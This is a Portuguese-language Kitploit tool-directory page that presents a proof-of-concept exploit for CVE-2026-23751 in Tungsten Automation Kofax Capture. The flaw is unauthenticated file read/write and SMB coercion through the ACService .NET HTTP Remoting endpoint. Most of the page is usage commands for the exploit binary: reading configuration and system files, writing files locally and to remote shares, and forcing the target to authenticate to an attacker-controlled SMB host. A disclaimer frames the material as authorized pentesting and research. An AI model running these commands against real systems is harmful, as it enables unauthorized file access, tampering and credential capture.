Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/siebrum/cve-2026-23751-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubsiebrum/cve-2026-23751-poc

CVE-2026-23751-poc

RemotingClient corrigido para explorar o CVE-2026-23751 (Tungsten Automation - Kofax Capture Leitura/Gravação de Arquivos Não Autenticada e coerção SMB via .NET HTTP Remoting)

Ver Repositório
há 6h 39mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23751-poc

Prova de conceito que reimplementa a técnica descrita em Code White's NewRemotingTricks, direcionada ao Tungsten Automation Kofax Capture.

CVE-2026-23751

Título: Tungsten Automation - Kofax Capture Leitura/Gravação de Arquivos Não Autenticada e Coerção SMB via .NET HTTP Remoting

CVE: CVE-2026-23751

Descrição

A CVE-2026-23751 afeta o Tungsten Automation Kofax Capture e permite que um atacante remoto não autenticado interaja com um endpoint .NET HTTP Remoting exposto pelo ACService do Kofax Capture.

A vulnerabilidade pode ser explorada para realizar:

  • Leitura arbitrária de arquivos não autenticada
  • Gravação arbitrária de arquivos não autenticada
  • Coerção de autenticação SMB
  • Acesso a arquivos locais acessíveis ao serviço Kofax Capture
  • Acesso a arquivos remotos por meio de caminhos UNC

O PoC reimplementa a técnica relevante de .NET Remoting do projeto NewRemotingTricks da Code White.

Endpoint Afetado

O PoC tem como alvo o endpoint HTTP Remoting ACService do Kofax Capture:

root@kitploit:~
http://<target>:2424/ACService

A porta 2424 é a porta padrão de HTTP Remoting usada pelo serviço afetado.

Uso

Ler um arquivo local

O exemplo a seguir lê o arquivo de hosts do Windows no alvo:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\System32\drivers\etc\hosts

Um arquivo de configuração do Kofax Capture pode ser lido de forma semelhante:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\ProgramData\Kofax\Remoting\Client\Configuration\ConfigInfo.xml

Gravar um arquivo local

Um arquivo pode ser gravado em um local acessível pelo serviço Kofax Capture fornecendo o caminho de destino seguido pelo conteúdo:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService C:\Windows\Temp\test.txt HelloWorld

Gravar em um compartilhamento SMB remoto

A mesma funcionalidade pode ser usada com um caminho UNC para gravar em um compartilhamento SMB remoto:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService \\<remote_host>\share\file.txt HelloWorld

A capacidade de acessar o recurso remoto depende das permissões e do contexto de segurança do serviço Kofax Capture.

Coerção SMB

Um URI file:// pode ser fornecido para fazer com que o alvo acesse um recurso SMB remoto:

root@kitploit:~
PS C:/> .\RemotingClient_MBRO_Lazy.exe http://<target>:2424/ACService file://\\<attacker>\file\file.txt

Isso pode fazer com que o host afetado autentique no servidor SMB controlado pelo atacante, dependendo do ambiente de destino e de sua configuração de segurança.

Contexto Técnico

A vulnerabilidade envolve o uso de .NET HTTP Remoting pelo ACService do Kofax Capture.

O .NET Remoting suporta vários esquemas de URI e mecanismos de serialização de objetos. Ao interagir com o endpoint de remoting exposto de uma maneira específica, um cliente não autenticado pode fazer com que o serviço execute operações no sistema de arquivos usando caminhos fornecidos pelo cliente.

O PoC demonstra como esse comportamento pode ser usado para:

  • Recuperar arquivos locais
  • Gravar dados em arquivos locais
  • Acessar caminhos UNC/SMB remotos
  • Acionar o acesso a recursos remotos file://

O PoC atualmente demonstra a gravação de dados de string em arquivos. Outros tipos de arquivo e formatos de payload podem ser suportados modificando o código-fonte de acordo.

Esta implementação é baseada em pesquisas e técnicas apresentadas em:

Code White - NewRemotingTricks

https://github.com/codewhitesec/NewRemotingTricks/tree/main

Requisitos

  • Windows
  • Acesso de rede ao ACService do Kofax Capture do alvo
  • Instância do Kofax Capture expondo o endpoint HTTP Remoting afetado
  • RemotingClient_MBRO_Lazy.exe

Nenhuma autenticação no serviço Kofax Capture é necessária para a exploração.

Aviso Legal

Este repositório é fornecido apenas para fins de pesquisa de segurança, validação de vulnerabilidades e testes de penetração autorizados.

Não use este PoC contra sistemas sem autorização explícita. O autor não é responsável por danos, perda de dados, acesso não autorizado ou outras consequências resultantes do uso indevido deste software.

Referências

  • CVE-2026-23751 — Tungsten Automation Kofax Capture Leitura/Gravação de Arquivos Não Autenticada e Coerção SMB via .NET HTTP Remoting
  • Code White - NewRemotingTricks
Baixar ferramenta